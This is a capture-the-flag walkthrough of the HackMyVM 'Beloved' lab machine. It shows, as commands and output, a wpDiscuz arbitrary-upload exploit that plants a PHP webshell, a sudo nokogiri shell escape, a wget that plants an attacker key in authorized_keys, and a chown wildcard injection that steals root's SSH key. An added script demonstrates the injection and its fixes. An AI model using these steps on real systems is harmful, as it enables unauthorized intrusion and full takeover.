HackMyVm Beloved Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Beloved
Scan for open ports.
~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
| 256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
|_ 256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.7.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Beloved – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 runs WordPress 5.7.2. Add beloved to /etc/hosts, then enumerate the installed plugins for known vulnerabilities.
~ wpscan --url http://beloved -e ap --no-banner --api-token yourkey --force --plugins-detection aggressive |tee wpscan.log
[+] wpdiscuz
| Location: http://beloved/wp-content/plugins/wpdiscuz/
| Last Updated: 2021-05-15T13:40:00.000Z
| Readme: http://beloved/wp-content/plugins/wpdiscuz/readme.txt
| [!] The version is out of date, the latest version is 7.2.2
|
| Found By: Known Locations (Aggressive Detection)
| - http://beloved/wp-content/plugins/wpdiscuz/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
| Fixed in: 7.0.5
| References:
| - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
| - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
| - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
|
| Version: 7.0.4 (80% confidence)
Search exploit-db for wpdiscuz.
~ searchsploit wpdiscuz
------------------------------------------------------------------------ ---------------------------------
Exploit Title                                                            | Path
------------------------------------------------------------------------ ---------------------------------
WordPress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticate | php/webapps/49962.sh
WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticate | php/webapps/49967.py
WordPress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload | php/webapps/49401.rb
------------------------------------------------------------------------ ---------------------------------
Run the PoC (49967.py), pointing it at an existing post.
~ python3 49967.py -u http://beloved -p /2021/06/09/hello-world/
[-] WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
[+] Response length:[51680] | code:[200]
[!] Got wmuSecurity value: 9c794f21e7
[!] Got wmuSecurity value: 1
[+] Generating random name for Webshell...
[!] Generated webshell name: bhgnpbentfvkgzh
[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url":"http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php"
Start a listener on port 1234, then use the webshell to launch a reverse shell back to it.
Check sudo -l as www-data.
www-data@beloved:/home$ sudo -l
Matching Defaults entries for www-data on beloved:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on beloved:
(beloved) NOPASSWD: /usr/local/bin/nokogiri
The nokogiri command-line tool needs a document to parse; once given one it drops into an interactive Ruby session with the parsed document in @doc, and from there system() runs whatever we like as beloved. Any file works, even an empty one.
www-data@beloved:/$ touch /tmp/log.txt
www-data@beloved:/$ sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
Your document is stored in @doc...
Switch to inspect mode.
system 'id'
uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
system '/bin/bash'
Now we are beloved. Fetch our public key into ~/.ssh/authorized_keys to get a proper SSH session.
cd .ssh
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-07-02 06:44:36-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
...
chmod 600 authorized_keys
SSH in as beloved.
~ ssh beloved@192.168.56.100
...
beloved@beloved:~$ id
uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
Run pspy64 to watch for cron jobs.
2021/07/02 06:47:01 CMD: UID=0 PID=1878 | /usr/sbin/CRON -f
2021/07/02 06:47:01 CMD: UID=0 PID=1879 | /bin/sh -c cd /opt && chown root:root *
In /opt there is only an id_rsa, owned by root with mode 600; it is probably root's private key. We need to make it readable as beloved.
beloved@beloved:/$ ls -la opt
total 12
drwxrwx--- 2 root beloved 4096 Jul 2 06:52 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
-rw------- 1 root root 1823 Jun 27 16:41 id_rsa
Use the chown wildcard trick. /opt is group-writable for beloved and the cron job runs chown root:root * with an unquoted glob, so the shell expands a file named --reference=ref into an option: chown then applies the owner and group of ref to every other file in the directory instead of root:root.
beloved@beloved:/opt$ touch ref
beloved@beloved:/opt$ touch -- --reference=ref
Wait a minute for the cron job to fire. id_rsa is now owned by beloved, the owner of ref:
beloved@beloved:/opt$ ls -la
total 12
drwxrwx--- 2 root beloved 4096 Jul 2 06:59 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
-rw------- 1 beloved beloved 1823 Jun 27 16:41 id_rsa
-rw-r--r-- 1 beloved beloved 0 Jul 2 06:58 ref
-rw-r--r-- 1 beloved beloved 0 Jul 2 06:59 '--reference=ref'
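As an added illustration (not part of the original walkthrough), the following POSIX shell script reproduces the argument injection in a scratch directory and contrasts it with the two usual fixes. The directory and file names are constructed here, the target owner is the current user so no root privileges are needed, and the cron job itself is not simulated: the point is what the shell hands to chown.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: show how an unquoted glob
# in "chown root:root *" lets a writable directory inject options, and what
# the safe forms look like. Everything is constructed in a temp directory.
set -eu

# Same layout as /opt on the box: the target file plus the two attacker-created
# names (hypothetical scratch directory, built here for the demo).
make_opt_lookalike() {
    dir=$(mktemp -d)
    touch "$dir/id_rsa" "$dir/ref" "$dir/--reference=ref"
    printf '%s\n' "$dir"
}

# The argument vector the shell hands to chown for "chown X *": the glob is
# expanded by the shell, so "--reference=ref" arrives as an option.
argv_unsafe() {
    ( cd "$1" && set -- * && printf '%s\n' "$@" )
}

# Fix 1: "./*" prefixes every name, so no expanded name can start with "-".
argv_safe_dotslash() {
    ( cd "$1" && set -- ./* && printf '%s\n' "$@" )
}

# Fix 2: "--" ends option parsing; names are unchanged but all are operands.
argv_safe_dashdash() {
    ( cd "$1" && set -- -- * && printf '%s\n' "$@" )
}

# Run the real chown with the current user as target owner (legal without
# root). The injected --reference=ref makes GNU chown take the owner string as
# a file operand, which does not exist, so the unsafe call fails with status 1.
chown_unsafe_status() {
    if ( cd "$1" && chown "$(id -un)" * 2>/dev/null ); then echo 0; else echo 1; fi
}

chown_safe_status() {
    if ( cd "$1" && chown "$(id -un)" -- * 2>/dev/null ); then echo 0; else echo 1; fi
}

# Count how many times an exact argument appears in an expander's output.
# $1 = dir, $2 = expander function, $3 = exact line to count
count_matching() {
    "$2" "$1" | grep -c -x -F -- "$3" || true
}

main() {
    d=$(make_opt_lookalike)
    echo "unsafe argv:";       argv_unsafe "$d"
    echo "safe argv (./*):";   argv_safe_dotslash "$d"
    echo "safe argv (--):";    argv_safe_dashdash "$d"
    echo "chown unsafe exit:"; chown_unsafe_status "$d"
    echo "chown safe exit:";   chown_safe_status "$d"
    rm -rf "$d"
}

main
```

The same reasoning gives the fix for the cron line: chown root:root -- /opt/* or, with cd, chown root:root ./* keeps attacker-chosen names from ever being parsed as options.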
Read id_rsa, copy it to the attacking machine, and use it to SSH in as root.
~ ssh root@192.168.56.100 -i key ...
root@beloved:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
beloved